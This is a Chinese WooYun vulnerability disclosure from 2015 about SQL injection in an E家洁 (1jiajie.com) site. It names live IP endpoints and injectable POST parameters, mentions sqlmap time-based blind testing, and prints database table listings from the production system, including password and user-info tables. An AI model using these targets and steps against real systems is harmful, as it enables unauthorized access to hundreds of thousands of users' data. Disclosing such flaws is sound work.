E家洁某站点多处SQL注入漏洞(15个库\涉及40万用户信息)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147507

漏洞标题：E家洁某站点多处SQL注入漏洞(15个库\涉及40万用户信息)

漏洞作者：路人甲

提交时间：2015-10-19 09:52

修复时间：2015-10-24 09:54

公开时间：2015-10-24 09:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-19：细节已通知厂商并且等待厂商处理中
2015-10-24：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

多处注入，涉及15个库，40多万用户信息，几百万订单信息！~~~

详细说明：

E家洁某站点多处SQL注入漏洞(15个库+40万用户信息)
1、注入点一

http://123.57.231.146:808/index.php?action=login&do=auth (POST)
username=admin&password=123456&user_id=345&user_name=admin&user_phone=13333333333

username存在注入，也是看了大牛的漏洞才找到这个地址的！~~~还没有修复

WooYun: E家洁某站点SQL注入漏洞(涉及15个库40万用户信息)
具体的数据见大牛的地址！~~~
2、注入点二

http://123.57.231.146:808/index.php?action=login&do=getUserInfo (POST)
user_name=admin

user_name存在注入
看burpsuite测试

上sqlmap测试
没有添加参数测试，存在时间盲注

添加参数--level 3测试，注入不一样！~~~

Database: sq_ejiajie
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| push_msg_queue                   | 2340536 |
| promo_code_type                  | 1358320 |
| driver_login_record              | 1037306 |
| b_wx_url_record                  | 994851  |
| attendance_log                   | 806808  |
| promo_code_record                | 724470  |
| user_request_order_log           | 675203  |
| user_visit_record                | 625581  |
| driver_call_record               | 613764  |
| user_request_order               | 577845  |
| user_money_record_log            | 536889  |
| push_message_info                | 482235  |
| user_password                    | 416681  |
| user_request_order_ext           | 300483  |
| mobile_number                    | 288731  |
| user_comment_relation            | 267405  |
| company_stock_goods_info         | 266178  |
| user_money_record                | 261989  |
| b_wx_qr_code_record              | 224111  |
| mobile                           | 208995  |
| b_wx_promo_code_record           | 205251  |
| broadcast                        | 202809  |
| user_money_relation              | 170712  |
| da_order                         | 152061  |
| driver_order_push                | 147983  |
| driver_call_record_now           | 127274  |
| user_charge_reward_record        | 100515  |
| user_address_info                | 95623   |
| all_user_finger                  | 95512   |
| user_money_relation_log          | 91544   |
| b_wx_point_like_zan              | 86497   |
| table_ceshi                      | 65535   |
| all_user_info                    | 64098   |
| driver_busy_time                 | 54932   |
| user_charge_record               | 43783   |
| user_call_record                 | 36746   |
| shop_data_stats                  | 34233   |
| shop_daily_pod_stats             | 34116   |
| user_free_code                   | 30329   |
| driver_pay_record                | 28000   |
| shop_daily_ine_stats             | 27969   |
| shop_daily_ine_stats_detail      | 27969   |
| da_driver_order                  | 25785   |
| weibo_feed_relation              | 23115   |
| promo_code_name                  | 22558   |
| ejiajie_push_record              | 21505   |
| user_request_order_temp          | 20330   |
| promote_access_record            | 18069   |
| shop_expense_record              | 16421   |
| driver_info                      | 14105   |
| driver_password                  | 14024   |
| new_customer_report              | 13570   |
| driver_state_relation            | 11841   |
| user_request_card                | 10777   |
| driver_month_rank                | 10673   |
| complain_order_relation          | 10183   |
| da_driver                        | 9414    |
| driver_modification              | 8938    |
| driver_info_copy                 | 8072    |
| driver_week_rank                 | 8058    |
| black_log                        | 8028    |
| driver_week_star                 | 6913    |
| da_order_type                    | 6673    |
| user_password_bak_3              | 6362    |
| user_high_intention              | 5877    |
| user_password_bak                | 5560    |
| da_mobile_scan                   | 5065    |
| project_number_total             | 5043    |
| driver_visit_record              | 4132    |
| company_shop_consuming_record    | 4105    |
| da_user_dau                      | 4002    |
| user_comment_relation_xxoo       | 3758    |
| user_problem_report              | 3716    |
| da_driver_dau                    | 3610    |
| activity_column_data             | 3396    |
| da_user_dnu                      | 3356    |
| da_day_data                      | 3280    |
| collect_driver_relation          | 3087    |
| a                                | 2966    |
| user_phone_info                  | 2777    |
| b_weixin_order_temp              | 2459    |
| user_want_service                | 2300    |
| user_charge_back_record          | 2097    |
| user_request_order_gaode         | 2064    |
| driver_info_temp_2               | 2051    |
| driver_call_record_temp          | 1980    |
| channle_record                   | 1958    |
| driver_address_record            | 1952    |
| company_stock_record             | 1423    |
| driver_info_other                | 1337    |
| driver_charge_record             | 1278    |
| driver_punish_record             | 1200    |
| car_info                         | 1079    |
| invoiced_record                  | 1055    |
| user_password_bak_2              | 802     |
| shop_money_record                | 517     |
| driver_cancel                    | 494     |
| driver_on_line                   | 482     |
| user_pay_calls                   | 425     |
| jc_admin_user                    | 417     |
| recharge_telephone_log           | 411     |
| driver_call_record_temp2         | 376     |
| user_deals_info                  | 365     |
| user_invite_record               | 356     |
| user_comment_record              | 300     |
| shop_info                        | 298     |
| user_call_count                  | 290     |
| add_phone                        | 221     |
| exchange_info                    | 211     |
| company_property_record          | 188     |
| company_stock_goods              | 179     |
| recharge_telephone               | 179     |
| driver_info_card                 | 178     |
| driver_train_record              | 178     |
| gaode_call_order                 | 149     |
| plan_task                        | 129     |
| tmp_calc                         | 120     |
| driver_info_upgrade              | 110     |
| company_property_goods           | 101     |
| special_user                     | 100     |
| user_charge_reward               | 97      |
| b_wx_qr_code                     | 94      |
| taobao_order_stats               | 93      |
| statistics_tab                   | 87      |
| user_request_order_modify        | 79      |
| da_scan_type                     | 75      |
| driver_punish_reason_detail      | 61      |
| monthly_service_info             | 40      |
| duiba_goods_record               | 25      |
| system_announcement              | 24      |
| company_store_house              | 23      |
| user_tele_info                   | 23      |
| channel_type                     | 22      |
| driver_reason_two_type           | 22      |
| market_info                      | 21      |
| company_stock_deploy_record      | 19      |
| activity_column_list             | 18      |
| auntday                          | 14      |
| shop_daily_ine_remark            | 14      |
| driver_recyclephone              | 12      |
| recover                          | 12      |
| broadcast_category               | 11      |
| company_property_supplier        | 11      |
| user_prize                       | 11      |
| user_recommen_driver             | 11      |
| monthly_settlement               | 10      |
| order_type                       | 10      |
| driver_report_order              | 8       |
| order_server_log                 | 7       |
| reset_score_record               | 7       |
| test_test                        | 7       |
| all_city_info                    | 6       |
| user_deals_style_branch          | 6       |
| bank_info                        | 5       |
| card_sell_record                 | 5       |
| driver_complain                  | 5       |
| driver_punish_reason_type        | 5       |
| company_property_goods_type_list | 4       |
| ivr_iphone_broad_cast_info       | 4       |
| user_notice_relation             | 4       |
| b_wx_send_record                 | 3       |
| service_info                     | 3       |
| b_wx_point_like_type             | 2       |
| driver_highintent_info           | 2       |
| driver_report_insurance          | 2       |
| ivr_broad_cast_info              | 2       |
| coupon_activity_list             | 1       |
| coupon_code_list                 | 1       |
| coupon_type_list                 | 1       |
| duducar_admin                    | 1       |
| fangzhongjie_info                | 1       |
| fangzhongjie_user_relation       | 1       |
| jia_duanxin                      | 1       |
+----------------------------------+---------+
Database: sq_ejiajie_v2
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| order_status                     | 3452654 |
| user_order                       | 2355576 |
| admin_proc_log                   | 2186611 |
| order_worker                     | 1994975 |
| worker_login_log                 | 1442334 |
| auto_assign_log                  | 1285166 |
| user_info                        | 745351  |
| transaction_record               | 743486  |
| user_address                     | 544835  |
| clean_order                      | 542985  |
| user_info_old                    | 520351  |
| order_pay                        | 519129  |
| worker_parttime_busy_time        | 298318  |
| user_comment                     | 275997  |
| company_stock_goods_info         | 266180  |
| agency_pay_record                | 151539  |
| send_msg_log                     | 144701  |
| user_order_process               | 126436  |
| driver_busy_time                 | 55582   |
| user_charge_record               | 33746   |
| order_hidden_worker              | 27345   |
| worker_block                     | 20023   |
| pop_order                        | 16423   |
| worker_info                      | 15517   |
| worker_pay_record                | 11316   |
| complain_order                   | 6161    |
| recharge_card_record             | 5982    |
| worker_holiday                   | 5450    |
| company_shop_consuming_record    | 5082    |
| pop_checkin_record               | 3019    |
| order_rule                       | 2387    |
| company_stock_record             | 1425    |
| invoiced_record                  | 1374    |
| admin_group_priv                 | 1173    |
| baidu_order                      | 1087    |
| pop_daily_checkin                | 1080    |
| jc_admin_user                    | 829     |
| user_block_worker                | 738     |
| role_change_record               | 537     |
| pop_notify                       | 308     |
| agency_info                      | 249     |
| company_stock_goods              | 179     |
| company_property_goods           | 101     |
| coordinate                       | 82      |
| agency_group_priv                | 67      |
| monthly_rule                     | 57      |
| shop_info                        | 55      |
| worker_insurance                 | 43      |
| jc_admin_group                   | 29      |
| ordersrc                         | 29      |
| wash_deliver                     | 29      |
| company_store_house              | 23      |
| company_stock_deploy_record      | 19      |
| period_order                     | 18      |
| visit_record                     | 15      |
| company_property_supplier        | 11      |
| app_update_info                  | 6       |
| recharge_card_rule               | 5       |
| company_property_goods_type_list | 4       |
| agency_group                     | 3       |
+----------------------------------+---------+

3、注入点三

http://123.57.231.146:808/index.php?action=login&do=sendPwdToPhone (POST)
id=345&username=admin&telephone=13333333333

id和username都存在注入，跟注入点一又不一样
burpsuite测试

sqlmap测试

4、不注入获取用户电话号码
用top500用户测试

漏洞证明：

如上

修复方案：

你们懂得！~~~
送礼物?

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-10-24 09:54

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147507

漏洞标题：E家洁某站点多处SQL注入漏洞(15个库\涉及40万用户信息)

相关厂商：1jiajie.com

漏洞作者：路人甲

提交时间：2015-10-19 09:52

修复时间：2015-10-24 09:54

公开时间：2015-10-24 09:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147507

漏洞标题：E家洁某站点多处SQL注入漏洞(15个库\涉及40万用户信息)

相关厂商：1jiajie.com

漏洞作者： 路人甲

提交时间：2015-10-19 09:52

修复时间：2015-10-24 09:54

公开时间：2015-10-24 09:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0147507"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云